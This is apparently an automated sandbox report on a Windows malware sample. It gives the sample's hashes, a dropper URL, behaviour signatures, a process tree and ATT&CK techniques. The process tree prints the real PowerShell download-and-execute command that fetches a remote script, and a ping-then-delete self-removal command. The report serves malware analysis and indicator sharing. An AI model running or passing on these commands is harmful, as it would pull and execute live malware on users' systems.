Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12-10-2023 21:38

General

  • Target

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe

  • Size

    247KB

  • MD5

    f17afa21e88b7a362db5ae8fdfa43de9

  • SHA1

    14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e

  • SHA256

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf

  • SHA512

    efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d

  • SSDEEP

    3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://aszfiltration.com/storage/files/debug2.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
    "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2392
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe" >> NUL
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2672

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2392-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
    Filesize

    2.9MB

  • memory/2392-5-0x00000000022B0000-0x00000000022B8000-memory.dmp
    Filesize

    32KB

  • memory/2392-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
    Filesize

    9.6MB

  • memory/2392-7-0x00000000028E0000-0x0000000002960000-memory.dmp
    Filesize

    512KB

  • memory/2392-8-0x00000000028E0000-0x0000000002960000-memory.dmp
    Filesize

    512KB

  • memory/2392-9-0x00000000028E0000-0x0000000002960000-memory.dmp
    Filesize

    512KB

  • memory/2392-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
    Filesize

    9.6MB

  • memory/2392-11-0x00000000028E0000-0x0000000002960000-memory.dmp
    Filesize

    512KB

  • memory/2392-12-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
    Filesize

    9.6MB

  • memory/2392-13-0x00000000028E0000-0x0000000002960000-memory.dmp
    Filesize

    512KB